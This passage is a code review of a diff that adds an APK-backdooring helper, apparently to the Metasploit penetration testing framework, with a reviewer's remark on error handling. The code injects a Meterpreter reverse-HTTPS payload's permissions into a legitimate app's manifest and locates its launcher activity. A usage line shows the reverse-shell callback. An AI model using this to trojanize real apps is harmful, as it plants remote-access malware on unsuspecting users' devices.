lib/msf/core/payload/apk.rb

```diff
@@ -0,0 +1,193 @@
+    print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
+  end
+
+  def run_cmd(cmd)
+    begin
+      stdin, stdout, stderr = Open3.popen3(cmd)
+      return stdout.read + stderr.read
+    rescue Errno::ENOENT
+      return nil
+    end
+  end
+
+  # Find the activity that is opened when you click the app icon
+  def find_launcher_activity(amanifest)
+    package = amanifest.xpath("//manifest").first['package']
+    activities = amanifest.xpath("//activity|//activity-alias")
+    for activity in activities
+      activityname = activity.attribute("name")
+      category = activity.search('category')
+      unless category
+        next
+      end
+      for cat in category
+        categoryname = cat.attribute('name')
+        if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
+          activityname = activityname.to_s
+          unless activityname.start_with?(package)
+            activityname = package + activityname
+          end
+          return activityname
+        end
+      end
+    end
+  end
+
+  def fix_manifest(tempdir)
+    payload_permissions=[]
+
+    #Load payload's permissions
+    File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file|
+      k=File.read(file)
+      payload_manifest=Nokogiri::XML(k)
+      permissions = payload_manifest.xpath("//manifest/uses-permission")
+      for permission in permissions
+        name=permission.attribute("name")
+        payload_permissions << name.to_s
+      end
+    }
+
+    original_permissions=[]
+    apk_mani=""
+
+    #Load original apk's permissions
+    File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2|
+      k=File.read(file2)
+      apk_mani=k
+      original_manifest=Nokogiri::XML(k)
+      permissions = original_manifest.xpath("//manifest/uses-permission")
+      for permission in permissions
+        name=permission.attribute("name")
+        original_permissions << name.to_s
+      end
+    }
+
+    #Get permissions that are not in original APK
+    add_permissions=[]
+    for permission in payload_permissions
+      if !(original_permissions.include? permission)
+        print_status("Adding #{permission}")
+        add_permissions << permission
+      end
+    end
+
+    inject=0
+    new_mani=""
+    #Inject permissions in original APK's manifest
+    for line in apk_mani.split("\n")
+      if (line.include? "uses-permission" and inject==0)
+        for permission in add_permissions
+          new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
+        end
+        new_mani << line+"\n"
+        inject=1
+      else
+        new_mani << line+"\n"
+      end
+    end
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
+  end
+
+  def backdoor_payload(apkfile, raw_payload)
+    unless apkfile && File.readable?(apkfile)
```

Comment:
This should probably not be in a giant catch-all rescue block, but instead raise an exception for each thing that needs a check.